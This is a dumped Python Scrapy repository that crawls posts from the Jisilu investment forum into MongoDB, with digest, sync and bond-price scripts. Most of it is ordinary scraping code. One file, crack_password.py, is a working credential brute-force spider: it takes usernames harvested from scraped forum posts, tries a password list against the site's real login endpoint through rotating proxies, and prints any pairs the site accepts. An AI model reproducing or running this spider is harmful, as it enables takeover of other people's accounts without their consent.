├── jsl
│   ├── __init__.py
│   ├── spiders
│   │   ├── __init__.py
│   │   ├── aes_encode.py
│   │   ├── crack_password.py
│   │   ├── relationship.py
│   │   ├── questions_loop.py
│   │   ├── jisilu_user_content.py
│   │   ├── weekly_content.py
│   │   ├── allcontent.py
│   │   └── questions.py
│   ├── items.py
│   ├── middlewares.py
│   ├── settings.py
│   └── pipelines.py
├── daily_trend.bat
├── jsl_daily_content.bat
├── jsl_comphrehensive_content.bat
├── .gitattributes
├── .gitignore
├── single_user.py
├── question.py
├── comprehensive_content.py
├── scrapy.cfg
├── daily_content.py
├── weekly_content.py
├── README.md
├── run.py
├── daily_send.py
├── mongo_syncup.py
├── guess_first_day_price.py
├── collect_username.py
├── trend.py
├── guess_first_day_price_syncup.py
├── crack_jsl.py
└── 数据迁移.ipynb
/jsl/__init__.py:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/daily_trend.bat:
--------------------------------------------------------------------------------
1 | cd C:\Users\Administrator\Documents\code\jsl
2 | python daily_send.py
--------------------------------------------------------------------------------
/jsl_daily_content.bat:
--------------------------------------------------------------------------------
1 | cd C:\Users\Administrator\Documents\code\jsl
2 | python daily_content.py
--------------------------------------------------------------------------------
/jsl_comphrehensive_content.bat:
--------------------------------------------------------------------------------
1 | cd C:\Users\Administrator\Documents\code\jsl
2 | python comprehensive_content.py
--------------------------------------------------------------------------------
/.gitattributes:
--------------------------------------------------------------------------------
1 | *.js linguist-language=python
2 | *.css linguist-language=python
3 | *.ipynb linguist-language=python
4 | *.html linguist-language=python
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | *.pyc
2 | .idea
3 | config.py
4 | *.log
5 | settings.py
6 | data.cfg
7 | config_path/config.json
8 | config_.py
9 | creator.txt
10 | userinfo.py
11 | .ipynb_checkpoints/
--------------------------------------------------------------------------------
/single_user.py:
--------------------------------------------------------------------------------
1 | from scrapy import cmdline
2 | import datetime
3 | # Run the single_user spider to fetch all posts from one user
4 |
5 | # cmd = 'scrapy crawl allcontent'
6 | cmd = 'scrapy crawl single_user'
7 | cmdline.execute(cmd.split())
--------------------------------------------------------------------------------
/jsl/spiders/__init__.py:
--------------------------------------------------------------------------------
1 | # This package will contain the spiders of your Scrapy project
2 | #
3 | # Please refer to the documentation for information on how to create and manage
4 | # your spiders.
5 |
--------------------------------------------------------------------------------
/question.py:
--------------------------------------------------------------------------------
1 | # -*-coding=utf-8-*-
2 |
3 | # @Time : 2018/12/27 17:04
4 | # @File : question.py
5 |
6 | from scrapy import cmdline
7 |
8 | cmd = 'scrapy crawl questions -s LOG_FILE=log/question.log'
9 | # cmd = 'scrapy crawl questions'
10 | cmdline.execute(cmd.split())
--------------------------------------------------------------------------------
/comprehensive_content.py:
--------------------------------------------------------------------------------
1 | from scrapy import cmdline
2 | import datetime
3 | # Fetch all posts within the specified date range
4 |
5 | # cmd = 'scrapy crawl allcontent'
6 | cmd = 'scrapy crawl allcontent -s LOG_FILE=log/allcontent-{}.log -a daily=no'.format(datetime.datetime.now().strftime('%Y-%m-%d'))
7 | cmdline.execute(cmd.split())
--------------------------------------------------------------------------------
/scrapy.cfg:
--------------------------------------------------------------------------------
1 | # Automatically created by: scrapy startproject
2 | #
3 | # For more information about the [deploy] section see:
4 | # https://scrapyd.readthedocs.org/en/latest/deploy.html
5 |
6 | [settings]
7 | default = jsl.settings
8 |
9 | [deploy]
10 | #url = http://localhost:6800/
11 | project = jsl
12 |
--------------------------------------------------------------------------------
/daily_content.py:
--------------------------------------------------------------------------------
1 | # -*-coding=utf-8-*-
2 |
3 | # @Time : 2018/12/27 16:58
4 | # @File : daily_content.py
5 | from scrapy import cmdline
6 | import datetime
7 | # Fetch all posts within the specified date range
8 |
9 | cmd = 'scrapy crawl allcontent -s LOG_FILE=log/allcontent-{}.log -a daily=yes'.format(datetime.datetime.now().strftime('%Y-%m-%d'))
10 | cmdline.execute(cmd.split())
11 |
--------------------------------------------------------------------------------
/weekly_content.py:
--------------------------------------------------------------------------------
1 | # -*-coding=utf-8-*-
2 |
3 | # @Time : 2018/12/27 16:58
4 | # @File : weekly_content.py
5 | from scrapy import cmdline
6 | import datetime
7 | # Fetch all posts within the specified date range
8 |
9 | # cmd = 'scrapy crawl allcontent -s LOG_FILE=log/allcontent-{}.log -a daily=yes'.format(datetime.datetime.now().strftime('%Y-%m-%d'))
10 | cmd = 'scrapy crawl week_content'
11 | cmdline.execute(cmd.split())
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # jsl
2 | Crawl posts from specified Jisilu (集思录) users and archive them to MongoDB.
3 |
4 | #### 2020-11-27 update: added JS encryption/decryption for the login step
5 | [http://30daydo.com/article/44109](http://30daydo.com/article/44109)
6 |
7 |
8 | Usage:
9 | Install scrapy + pymongo and set up a MongoDB server.
10 |
11 | After installation, run python run.py
12 | Enter the username you want to crawl, e.g. 毛之川
13 | Wait for the program to return the user's id, then copy that id into spider/jisilu.py, replacing the value in self.uid = '8132'
14 | Modify this line in pipeline.py:
15 | self.user = u'毛之川'  # change it to the target username, e.g. 毛之川
16 |
17 | #### Added: crawl the whole site
18 |
19 | #### guess_first_day_price_syncup.py: estimate the listing-day price of convertible bonds
20 |
21 | ### Follow the WeChat official account: 可转债量化分析
22 | 
--------------------------------------------------------------------------------
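Note: jsl/config.py and the root-level settings.py are git-ignored (see .gitignore) and therefore missing from this dump. Below is a minimal sketch of the fields jsl/config.py is expected to expose, inferred from the `from jsl import config` usages across the spiders, pipelines and helper scripts; every value shown is a placeholder, not a real credential.

# jsl/config.py -- illustrative sketch only; all values are placeholders
# MongoDB credentials used by pipelines.py, collect_username.py, crack_password.py
user = 'mongo_user'
password = 'mongo_password'
mongodb_host = '127.0.0.1'
mongodb_port = 27017
doc_name = 'jsl'              # collection name inside the db_parker database

# Jisilu login, encrypted by jsl/spiders/aes_encode.decoder() before posting
jsl_user = 'your_jsl_username'
jsl_password = 'your_jsl_password'

uid = '8132'                  # target user id for the single_user spider
proxy_ip = '127.0.0.1'        # proxy API host used by middlewares.py
LASTEST_ID = 394716           # newest question id, used by the questions_loop spider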
/jsl/spiders/aes_encode.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | # @Time : 2020/11/27 22:00
3 | # @File : aes_encode.py
4 | # @Author : Rocky C@www.30daydo.com
5 |
6 | import execjs
7 | import os
8 | key = '397151C04723421F'
9 | filename = 'encode_jsl.js'
10 | path = os.path.dirname(os.path.abspath(__file__))
11 | full_path = os.path.join(path,filename)
12 |
13 | def decoder(text):
14 | with open(full_path, 'r', encoding='utf8') as f:
15 | source = f.read()
16 |
17 | ctx = execjs.compile(source)
18 | return ctx.call('jslencode', text, key)
19 |
20 |
21 | if __name__ == '__main__':
22 | print(decoder('123456'))
--------------------------------------------------------------------------------
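For context (not an extra repo file): the spiders call this helper during login, running the plain-text credentials from config through decoder() before posting them. A condensed illustration, mirroring the login() callbacks in jisilu_user_content.py and the weekly/allcontent spiders:

# Credentials are AES-encrypted in JS (encode_jsl.js) via decoder() before submission.
from jsl.spiders.aes_encode import decoder
from jsl import config

login_form = {
    'return_url': 'https://www.jisilu.cn/',
    'user_name': decoder(config.jsl_user),
    'password': decoder(config.jsl_password),
    'net_auto_login': '1',
    '_post_type': 'ajax',
}
# The spiders submit this dict with scrapy.FormRequest to
# https://www.jisilu.cn/account/ajax/login_process/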
/run.py:
--------------------------------------------------------------------------------
1 | # -*-coding=utf-8-*-
2 |
3 | __author__ = 'Rocky'
4 | '''
5 | http://30daydo.com
6 | Email: weigesysu@qq.com
7 | '''
8 | from scrapy import cmdline
9 | import requests
10 | import re
11 |
12 | def search_id():
13 | name = input(u'请输入你需要抓取的用户名: ')
14 | url = 'https://www.jisilu.cn/people/{}'.format(str(name))
15 | # url ='https://www.jisilu.cn/people/持有封基'
16 | r = requests.get(url)
17 | user_id = re.findall('var PEOPLE_USER_ID = \'(\d+)\';' , r.text)
18 | print(user_id[0])
19 |
20 | def main():
21 | # search_id()
22 | # exit()
23 |
24 | cmd = 'scrapy crawl allcontent'
25 |     cmdline.execute(cmd.split())
26 |
27 |
28 | if __name__ == '__main__':
29 | main()
--------------------------------------------------------------------------------
/jsl/items.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | # Define here the models for your scraped items
4 | #
5 | # See documentation in:
6 | # http://doc.scrapy.org/en/latest/topics/items.html
7 |
8 | import scrapy
9 |
10 |
11 | class JslItem(scrapy.Item):
12 | # define the fields for your item here like:
13 | # name = scrapy.Field()
14 | title = scrapy.Field()
15 | creator = scrapy.Field()
16 | content = scrapy.Field()
17 | content_html = scrapy.Field()
18 | url = scrapy.Field()
19 | html = scrapy.Field()
20 | question_id = scrapy.Field()
21 | createTime = scrapy.Field()
22 | resp_no = scrapy.Field()
23 | resp = scrapy.Field() # list
24 | crawlTime = scrapy.Field()
25 | # type_ = scrapy.Field()
26 | last_resp_date = scrapy.Field()
27 | only_add = scrapy.Field()
28 |
29 | class Relationship(scrapy.Item):
30 | user_id = scrapy.Field()
31 | flag = scrapy.Field()
32 | user = scrapy.Field()
33 | prestige = scrapy.Field() # 威望
34 | approve = scrapy.Field() # 赞同
35 | follows_count = scrapy.Field()
36 | fans_count = scrapy.Field()
37 | follows_list = scrapy.Field()
38 | fans_list = scrapy.Field()
39 | crawltime = scrapy.Field()
40 |
41 |
42 |
--------------------------------------------------------------------------------
/daily_send.py:
--------------------------------------------------------------------------------
1 | # Daily hot-post digest
2 |
3 | import datetime
4 | import pymongo
5 | from settings import send_from_aliyun,DBSelector
6 |
7 | last_time = -10  # how many weeks back
8 |
9 |
10 | db=DBSelector().mongo()
11 | MAX = 1000
12 | current = datetime.datetime.now()
13 |
14 | last_day = current + datetime.timedelta(hours=-32)  # the script is scheduled to run at 8 a.m.
15 | current_str = current.strftime("%Y-%m-%d")
16 |
17 |
18 | def main():
19 | result = db['db_parker']['jsl'].find({},{'html':0}).sort('_id',pymongo.DESCENDING).limit(MAX)
20 | filter_result = []
21 | for i in result:
22 | createTime = i['createTime']
23 | createTime = datetime.datetime.strptime(createTime,'%Y-%m-%d %H:%M')
24 | if createTime >= last_day :
25 | title = i['title']
26 | creator = i['creator']
27 | resp_count = len(i['resp'])
28 | url = i['url']
29 | d = {'title':title,'url':url,'resp_count':resp_count}
30 | filter_result.append(d)
31 |
32 | hot_list = list(sorted(filter_result,key=lambda x:x['resp_count'],reverse=True))[:10]
33 | title,html = format_mail(hot_list)
34 | try:
35 | send_from_aliyun(title,html,types='html')
36 |
37 | except Exception as e:
38 | # logger.error(e)
39 | print(e)
40 |
41 |
42 | def format_mail(hot_list):
43 | title='{} jsl TOP10'.format(current_str)
44 | content = ''
45 | for hl in hot_list:
46 |         content+='<a href="{}">{}</a> 回复:{}<br>'.format(hl['url'],hl['title'],hl['resp_count'])
47 |
48 | return title,content
49 |
50 |
51 |
52 | if __name__ == '__main__':
53 | main()
--------------------------------------------------------------------------------
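daily_send.py, trend.py and mongo_syncup.py import send_from_aliyun, llogger and DBSelector from the root-level settings.py, which is git-ignored and not included here. A minimal stand-in sketch under stated assumptions: DBSelector.mongo() returns a pymongo.MongoClient (mongo_syncup.py calls it with a server name, trend.py and daily_send.py without one), and mail is sent with plain smtplib instead of the author's Aliyun setup; hosts and addresses are placeholders.

# settings.py (project root) -- illustrative stand-in, not the original implementation
import logging
import smtplib
from email.mime.text import MIMEText

import pymongo

# placeholder connection strings; 'qq' mirrors the server name used in mongo_syncup.py
MONGO_SERVERS = {None: 'mongodb://localhost:27017', 'qq': 'mongodb://remote-host:27017'}


class DBSelector:
    def mongo(self, name=None):
        # return a client for the requested server, falling back to the local one
        return pymongo.MongoClient(MONGO_SERVERS.get(name, MONGO_SERVERS[None]))


def llogger(filename):
    # file logger used by trend.py
    logger = logging.getLogger(filename)
    logger.setLevel(logging.INFO)
    logger.addHandler(logging.FileHandler(filename, encoding='utf8'))
    return logger


def send_from_aliyun(title, content, types='plain'):
    # stand-in mail sender: plain SMTP instead of Aliyun DirectMail
    msg = MIMEText(content, 'html' if types == 'html' else 'plain', 'utf-8')
    msg['Subject'] = title
    msg['From'] = 'sender@example.com'
    msg['To'] = 'receiver@example.com'
    with smtplib.SMTP('smtp.example.com', 25) as server:
        server.sendmail(msg['From'], [msg['To']], msg.as_string())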
/mongo_syncup.py:
--------------------------------------------------------------------------------
1 | # Sync data between two MongoDB instances
2 | import pymongo
3 | from settings import DBSelector
4 | from loguru import logger
5 |
6 | logger.add('syncup.log')
7 | db=DBSelector()
8 | client = db.mongo('qq')
9 | remote=client['db_parker']['jsl']
10 | local=pymongo.MongoClient()['db_parker']['jsl']
11 | remote_data = remote.find()
12 |
13 | # update the local copy
14 | def update(item,question_id,update=False):
15 | del item['_id']
16 |
17 | if update:
18 | local.update_one({'question_id':question_id},{'$set':{'resp':item['resp'],'resp_no':item['resp_no']}})
19 | else:
20 | local.insert_one(item)
21 | remote.delete_one({'question_id': question_id})
22 |
23 | def remove(item):
24 | remote.delete_one({'_id': item['_id']})
25 |
26 |
27 |
28 | for item in remote_data:
29 | question_id = item['question_id']
30 | local_find_doc = local.find_one({'question_id':question_id})
31 | if local_find_doc:
32 | resp_no = item['resp_no']
33 |
34 | if resp_no<=local_find_doc['resp_no']:
35 | try:
36 | remove(item)
37 | except Exception as e:
38 | logger.error(e)
39 | else:
40 | logger.info(f'删除相同{question_id}')
41 |
42 | else:
43 | try:
44 | update(item,question_id,True)
45 | except Exception as e:
46 | logger.error(e)
47 |
48 | else:
49 | logger.info(f'更新本地{question_id}')
50 | else:
51 | try:
52 | update(item,question_id,False)
53 | except Exception as e:
54 | logger.error(e)
55 | else:
56 | logger.info(f'删除不存在,备份后的{question_id}')
57 |
--------------------------------------------------------------------------------
/guess_first_day_price.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | # website: http://30daydo.com
3 | # @Time : 2019/7/10 22:46
4 | # @File : guess_first_day_price.py
5 |
6 | # Estimate the price on the first trading day
7 | # The Twisted-based approach did not work reliably
8 |
9 | from twisted.web.client import getPage
10 | from twisted.internet import reactor
11 | from twisted.internet import defer
12 | from scrapy.selector import Selector
13 | import numpy as np
14 |
15 | result_list = []
16 |
17 | def get_response_callback(content):
18 | # print(content)
19 |
20 | text = str(content,encoding='utf-8')
21 | # print(text)
22 | response = Selector(text=text)
23 | nodes = response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div')
24 | for node in nodes:
25 | reply = node.xpath('.//div[@class="markitup-box"]/text()').extract_first()
26 | if reply:
27 | reply = reply.strip()
28 | # print(reply)
29 | result_list.append(float(reply))
30 |
31 | print('done')
32 |
33 |
34 | @defer.inlineCallbacks
35 | def task(url):
36 | d= getPage(url.encode('utf-8'))
37 | d.addCallback(get_response_callback)
38 | yield d
39 |
40 | def get_result():
41 | # print(result_list)
42 | # print(result_list)
43 | result = np.array(result_list)
44 | print(result.mean())
45 |
46 | urls='https://www.jisilu.cn/question/id-321075__sort_key-__sort-DESC__uid-__page-{}'
47 | d_list=[]
48 | page = 4
49 | for i in range(1,page+1):
50 | # print(urls.format(i))
51 | t = task(urls.format(i))
52 | # t = task(urls)
53 | d_list.append(t)
54 | d = defer.DeferredList(d_list)
55 | d.addCallback(lambda _: get_result())  # report the mean price once all pages are parsed
56 | d.addBoth(lambda _: reactor.stop())
57 | reactor.run()
58 |
59 |
--------------------------------------------------------------------------------
/collect_username.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | # website: http://30daydo.com
3 | # @Time : 2020/9/5 14:25
4 | # @File : collect_username.py
5 | import pymongo
6 | import codecs
7 | from loguru import logger
8 | from jsl import config
9 |
10 | connect_uri = f'mongodb://{config.user}:{config.password}@{config.mongodb_host}:{config.mongodb_port}'
11 | client = pymongo.MongoClient(connect_uri)
12 |
13 | doc = client['db_parker'][config.doc_name]
14 |
15 | def collect_creator():
16 | creators = doc.find({},{'creator':1})
17 | user_set = set()
18 | count = 0
19 | for create in creators.batch_size(100):
20 | print(count)
21 | count+=1
22 | name = create.get('creator')
23 | # print(name)
24 | if name is not None and isinstance(name,str):
25 | user_set.add(name)
26 | user_list = list(user_set)
27 | user_str = '\n'.join(user_list)
28 | with codecs.open('creator.txt','w',encoding='utf8') as f:
29 | f.write(user_str)
30 |
31 |
32 | def get_user(filename):
33 | user_list = None
34 | with codecs.open(filename,'r',encoding='utf8') as f:
35 | user_list = f.readlines()
36 | user_list=set(map(lambda x:x.strip(),user_list))
37 | return user_list
38 |
39 | def repler():
40 | resps = doc.find({},{'resp':1,'_id':0})
41 | user_set = set()
42 | count = 0
43 | creartor_set = get_user('creator.txt')
44 |
45 | for resp in resps.batch_size(500):
46 | resp_list = resp.get('resp')
47 | if resp_list:
48 | for resp_ in resp_list:
49 | name=list(resp_.keys())[0]
50 | if name not in creartor_set and name not in user_set:
51 | count += 1
52 | print(count)
53 | print(name)
54 | user_set.add(name)
55 | user_list = list(user_set)
56 | user_str = '\n'.join(user_list)
57 | with codecs.open('reply.txt','w',encoding='utf8') as f:
58 | f.write(user_str)
59 |
60 | repler()
61 | logger.info('Done')
62 |
63 |
64 |
--------------------------------------------------------------------------------
/trend.py:
--------------------------------------------------------------------------------
1 | # -*-coding=utf-8-*-
2 |
3 | # @Time : 2020/1/1 0:08
4 | # @File : trend.py
5 | # Post-volume trend statistics
6 | import datetime
7 | import numpy as np
8 | import pandas as pd
9 | from settings import send_from_aliyun, llogger,DBSelector
10 |
11 | last_time = -10  # how many weeks back
12 |
13 | logger = llogger('log/trend_.log')
14 | db = DBSelector().mongo()
15 | doc = db['db_parker']['jsl']
16 | total_list = []
17 | date = datetime.datetime.now() + datetime.timedelta(days=-365)  # data within the past year
18 |
19 |
20 | def main(send_mail=True):
21 | for item in doc.find({'last_resp_date': {'$gt': date}}, {'html': 0, 'resp': 0, 'content': 0}):
22 | del item['_id']
23 | total_list.append(item)
24 |
25 | df = pd.DataFrame(total_list)
26 | df['createTime'] = pd.to_datetime(df['createTime'])
27 | df = df.set_index('createTime', drop=True)
28 | new_df = df.resample('W').count()
29 | show_data = new_df[['creator']].iloc[:last_time:-1]
30 | # print(show_data)
31 |     # the week with the maximum post count and its date
32 | max_index = new_df['creator'].idxmax().to_pydatetime().strftime('%Y-%m-%d')
33 | max_v = new_df['creator'].max()
34 | current = datetime.datetime.now().strftime('%Y-%m-%d')
35 | title = f'jsl一周发帖数量分析 {current}'
36 | percentage = np.round(
37 | (show_data['creator'].values[:-1] - show_data['creator'].values[1:]) / show_data['creator'].values[1:] * 100, 0)
38 | content = '| 日期 | 贴数 | 环比 |\n'
39 | # print(percentage)
40 | percentage = np.append(percentage, np.nan)
41 | start_index = 0
42 | for index, item in show_data.iterrows():
43 | # print(index,item['creator'])
44 | py_date = index.to_pydatetime().strftime('%Y-%m-%d')
45 | count = item['creator']
46 | content += f'| {py_date} | {count} | {percentage[start_index]}% |\n'
47 | start_index += 1
48 | content += f'最大值发生在 {max_index},贴数为 {max_v}\n'
49 | logger.info(title)
50 | logger.info(content)
51 | if send_mail:
52 | try:
53 | send_from_aliyun(title, content)
54 | except Exception as e:
55 | logger.error(e)
56 |
57 |
58 | def process_data():
59 | '''
60 |     Clean up records with missing fields (e.g. no crawlTime)
61 | :return:
62 | '''
63 | # for item in doc.find({'createTime': {"$regex": "^发"}}, {'_id': 1,'createTime':1}):
64 | for item in doc.find({'crawlTime': None}, {'_id': 1}):
65 | # print(item)
66 | doc.delete_one({'_id': item['_id']})
67 | print(item)
68 |
69 | if __name__ == '__main__':
70 | main(send_mail=True)
71 | # process_data()
72 |
--------------------------------------------------------------------------------
/jsl/middlewares.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | # Define here the models for your spider middleware
4 | #
5 | # See documentation in:
6 | # http://doc.scrapy.org/en/latest/topics/spider-middleware.html
7 | import time
8 |
9 | import requests
10 | from scrapy import signals
11 | from jsl.config import proxy_ip
12 |
13 | class JslSpiderMiddleware(object):
14 | # Not all methods need to be defined. If a method is not defined,
15 | # scrapy acts as if the spider middleware does not modify the
16 | # passed objects.
17 |
18 | @classmethod
19 | def from_crawler(cls, crawler):
20 | # This method is used by Scrapy to create your spiders.
21 | s = cls()
22 | crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
23 | return s
24 |
25 | def process_spider_input(self, response, spider):
26 | # Called for each response that goes through the spider
27 | # middleware and into the spider.
28 |
29 | # Should return None or raise an exception.
30 | return None
31 |
32 | def process_spider_output(self, response, result, spider):
33 | # Called with the results returned from the Spider, after
34 | # it has processed the response.
35 |
36 | # Must return an iterable of Request, dict or Item objects.
37 | for i in result:
38 | yield i
39 |
40 | def process_spider_exception(self, response, exception, spider):
41 | # Called when a spider or process_spider_input() method
42 | # (from other spider middleware) raises an exception.
43 |
44 | # Should return either None or an iterable of Response, dict
45 | # or Item objects.
46 | pass
47 |
48 | def process_start_requests(self, start_requests, spider):
49 | # Called with the start requests of the spider, and works
50 | # similarly to the process_spider_output() method, except
51 | # that it doesn’t have a response associated.
52 |
53 | # Must return only requests (not items).
54 | for r in start_requests:
55 | yield r
56 |
57 | def spider_opened(self, spider):
58 | spider.logger.info('Spider opened: %s' % spider.name)
59 |
60 | class MyCustomDownloaderMiddleware(object):
61 | def __init__(self):
62 | self.proxyurl = 'http://{}:8101/dynamicIp/common/getDynamicIp.do'.format(proxy_ip)
63 |
64 | def process_request(self, request, spider):
65 | proxyServer = self.get_proxy()
66 | print('使用了代理')
67 | print(proxyServer)
68 | request.meta["proxy"] = proxyServer
69 |
70 | def get_proxy(self, retry=50):
71 | for i in range(retry):
72 | try:
73 | r = requests.get(self.proxyurl, timeout=10)
74 | except Exception as e:
75 | print(e)
76 | print('Failed to get proxy ip, retry ' + str(i))
77 | time.sleep(1)
78 | else:
79 | js = r.json()
80 | proxyServer = 'https://{0}:{1}'.format(js.get('ip'), js.get('port'))
81 | return proxyServer
82 |
83 | return None
84 |
--------------------------------------------------------------------------------
/jsl/spiders/crack_password.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | # website: http://30daydo.com
3 | # @Time : 2020/9/5 14:03
4 | # @File : crack_password.py
5 |
6 | # Login cracking (brute-force password check)
7 | import json
8 |
9 | import pymongo
10 | from scrapy import Spider
11 | import codecs
12 | from scrapy import FormRequest, Request
13 | from jsl import config
14 |
15 | class CrackSpider(Spider):
16 | name = 'crack'
17 | custom_settings = {'COOKIES_ENABLED': False,
18 | 'DOWNLOADER_MIDDLEWARES': {'jsl.middlewares.MyCustomDownloaderMiddleware': 543},
19 | 'ITEM_PIPELINES': {'jsl.pipelines.JslPipeline': None},
20 | 'CONCURRENT_REQUESTS':1
21 | }
22 |
23 | def __init__(self, *args,**kwargs):
24 | super(CrackSpider, self).__init__(*args,**kwargs)
25 | self.doc = pymongo.MongoClient(host=config.mongodb_host,port=config.mongodb_port)
26 |
27 | filename = 'creator.txt'
28 | with codecs.open(filename, 'r', encoding='utf8') as f:
29 | conent = f.readlines()
30 | self.content = list(map(lambda x: x.strip(), conent))
31 |
32 | self.url = 'https://www.jisilu.cn/account/ajax/login_process/'
33 | self.data = {
34 | 'return_url': 'https://www.jisilu.cn/',
35 | 'user_name': '',
36 | 'password': '',
37 | 'net_auto_login': '1',
38 | '_post_type': 'ajax',
39 | }
40 | self.headers = {
41 | 'Host': 'www.jisilu.cn', 'Connection': 'keep-alive', 'Pragma': 'no-cache',
42 | 'Cache-Control': 'no-cache', 'Accept': 'application/json,text/javascript,*/*;q=0.01',
43 | 'Origin': 'https://www.jisilu.cn', 'X-Requested-With': 'XMLHttpRequest',
44 | 'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36',
45 | 'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
46 | 'Referer': 'https://www.jisilu.cn/login/',
47 | 'Accept-Encoding': 'gzip,deflate,br',
48 | 'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8'
49 | }
50 | with open('password.txt', 'r') as f:
51 | password_list = f.readlines()
52 | self.password_list = list(map(lambda x: x.strip(), password_list))
53 |
54 | def start_requests(self):
55 |
56 | yield Request(
57 | url='https://www.jisilu.cn',
58 | headers=self.headers,
59 | callback=self.parse_user,
60 | cookies=None,
61 | )
62 |
63 | def parse_user(self, response):
64 |         while self.content:
65 |             user = self.content.pop()
66 | for password in self.password_list:
67 | data = self.data.copy()
68 | data['user_name'] = user
69 | data['password'] = password
70 | yield FormRequest(
71 | url=self.url,
72 | headers=self.headers,
73 | formdata=data,
74 | callback=self.parse_data,
75 | dont_filter=True,
76 | cookies=None,
77 | meta={'username':user,'password':password}
78 | )
79 |
80 | def parse_data(self, response):
81 | print(response.text)
82 | js_data = json.loads(response.text)
83 | errno = js_data.get('errno')
84 | if errno==0:
85 | print('*********')
86 | print('user==>',response.meta['username'])
87 | print('password==>',response.meta['password'])
--------------------------------------------------------------------------------
/guess_first_day_price_syncup.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | # website: http://30daydo.com
3 | # @Time : 2019/10/20 19:41
4 | # @File : guess_first_day_price_syncup.py
5 |
6 | # Synchronous version (Selenium-based)
7 | import sys
8 | import time
9 | from selenium import webdriver
10 | from scrapy.selector import Selector
11 | from jsl import config
12 | import pymongo
13 |
14 |
15 |
16 | headers = {'User-Agent': 'FireFox Molliza Chrome'}
17 | path = r'D:\OneDrive\Python\selenium\chromedriver.exe'
18 | option = webdriver.ChromeOptions()
19 | option.add_argument(
20 | '--user-agent=Mozilla/5.0 (Windows NT 9.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36')
21 | option.add_argument('--headless')
22 | driver = webdriver.Chrome(executable_path=path, chrome_options=option)
23 | driver.implicitly_wait(10)
24 |
25 |
26 | def login():
27 | url = 'https://www.jisilu.cn/login/'
28 | driver.get(url)
29 | input_name = driver.find_element_by_xpath('//input[@id="aw-login-user-name"]')
30 | input_name.send_keys(config.jsl_user)
31 | password = driver.find_element_by_xpath('//input[@id="aw-login-user-password"]')
32 | password.send_keys(config.jsl_password)
33 | time.sleep(0.5)
34 | submit = driver.find_element_by_xpath('//a[@id="login_submit"]')
35 | submit.click()
36 | time.sleep(5)
37 |
38 |
39 | def predict(url,name):
40 |
41 | driver.get(url)
42 | current_page = 1
43 |     total = 0
44 | price_list = []
45 | while 1:
46 |
47 | try:
48 |
49 | price = parse(driver.page_source)
50 | if price:
51 | price_list.extend(price)
52 |
53 | next_btn = driver.find_element_by_xpath('//div[@class="pagination pull-right"]//a[contains(text(),">")]')
54 |
55 | except Exception as e:
56 | print(e)
57 | break
58 | else:
59 |
60 | current_page += 1
61 | next_btn.click()
62 |     # drop the max and min values before averaging
63 | max_v=max(price_list)
64 | min_v=min(price_list)
65 | # print(price_list)
66 | price_list.remove(max_v)
67 | price_list.remove(min_v)
68 | # print(price_list)
69 | # price_np = np.array(price_list)
70 |     for i in price_list:
71 |         total += i
72 |
73 |     avg = round(total / len(price_list), 3)
74 | print(f'avg price {avg}')
75 | client = pymongo.MongoClient(config.mongodb_host, config.mongodb_port)
76 | doc = client['db_stock']['kzz_price_predict']
77 | doc.insert_one({'name':name,'predict_price':avg})
78 | driver.close()
79 |
80 |
81 | def parse(text):
82 | response = Selector(text=text)
83 | nodes = response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')
84 | result_list = []
85 | for node in nodes:
86 | comment = node.xpath(
87 | './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]/text()').extract_first()
88 | if comment:
89 | comment = comment.strip()
90 | try:
91 | comment = float(comment)
92 |
93 | except Exception as e:
94 | continue
95 | else:
96 | result_list.append(comment)
97 | else:
98 | continue
99 | return result_list
100 |
101 |
102 | def main(url,name):
103 | login()
104 | predict(url,name)
105 |
106 | if __name__ == '__main__':
107 | if len(sys.argv)!=3:
108 |         print('usage: python guess_first_day_price_syncup.py url name\n')
109 | else:
110 | url=sys.argv[1]
111 | name =sys.argv[2]
112 | main(url,name)
113 |
--------------------------------------------------------------------------------
/jsl/settings.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | # Scrapy settings for jsl project
4 | #
5 | # For simplicity, this file contains only settings considered important or
6 | # commonly used. You can find more settings consulting the documentation:
7 | #
8 | # http://doc.scrapy.org/en/latest/topics/settings.html
9 | # http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
10 | # http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
11 |
12 | BOT_NAME = 'jsl'
13 |
14 | SPIDER_MODULES = ['jsl.spiders']
15 | NEWSPIDER_MODULE = 'jsl.spiders'
16 |
17 |
18 | # Crawl responsibly by identifying yourself (and your website) on the user-agent
19 | #USER_AGENT = 'jsl (+http://www.yourdomain.com)'
20 |
21 | # Obey robots.txt rules
22 | ROBOTSTXT_OBEY = False
23 |
24 | # Configure maximum concurrent requests performed by Scrapy (default: 16)
25 |
26 | #CONCURRENT_REQUESTS = 32
27 | # LOG_LEVEL='INFO'
28 | CONCURRENT_REQUESTS = 2
29 | LOG_LEVEL='INFO'
30 | DOWNLOAD_DELAY = 1
31 | # REDIRECT_ENABLED = False
32 | # Configure a delay for requests for the same website (default: 0)
33 | # See http://scrapy.readthedocs.org/en/latest/topics/settings.html#download-delay
34 | # See also autothrottle settings and docs
35 | # DOWNLOAD_DELAY = 1
36 | # The download delay setting will honor only one of:
37 | #CONCURRENT_REQUESTS_PER_DOMAIN = 16
